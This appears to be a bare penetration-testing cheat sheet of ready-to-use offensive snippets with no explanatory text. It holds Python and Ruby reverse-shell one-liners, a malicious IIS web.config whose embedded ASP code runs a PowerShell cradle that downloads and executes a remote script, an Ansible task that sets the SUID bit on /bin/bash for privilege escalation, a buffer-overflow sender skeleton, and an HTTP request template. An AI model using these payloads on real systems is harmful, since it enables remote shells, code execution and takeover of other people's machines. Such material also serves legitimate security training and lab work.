python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<local_ip>",<local_port>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
ruby -rsocket -e'f=TCPSocket.open("<local_ip>",<local_port>).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<handlers accessPolicy="Read, Script, Write">
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
</handlers>
<security>
<requestFiltering>
<fileExtensions>
<remove fileExtension=".config" />
</fileExtensions>
<hiddenSegments>
<remove segment="web.config" />
</hiddenSegments>
</requestFiltering>
</security>
</system.webServer>
</configuration>
<!-- ASP code comes here! It should not include HTML comment closing tag and double dashes!
<%
Set s = CreateObject("WScript.Shell")
Set cmd = s.Exec("cmd /c powershell -c IEX (New-Object Net.Webclient).downloadstring('http://10.10.14.10/shellyjelly.ps1')")
o = cmd.StdOut.Readall()
Response.write(o)
%>
-->
- hosts: localhost
tasks:
- name: badyml
command: chmod +s /bin/bash
#!/usr/bin/python
import socket,sys
address = '127.0.0.1'
port = 9999
buffer = #TBD
try:
print '[+] Sending buffer'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((address,port))
s.recv(1024)
s.send(buffer + '\r\n')
except:
print '[!] Unable to connect to the application.'
sys.exit(0)
finally:
s.close()
POST /<path> HTTP/1.1
Host: <remote_ip>
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Content-Type: application/json
Content-Length: 95
Connection: close
{
"auth":{
"name":"<user>",
"password":"<password>"
},
"filename":"<file>"
}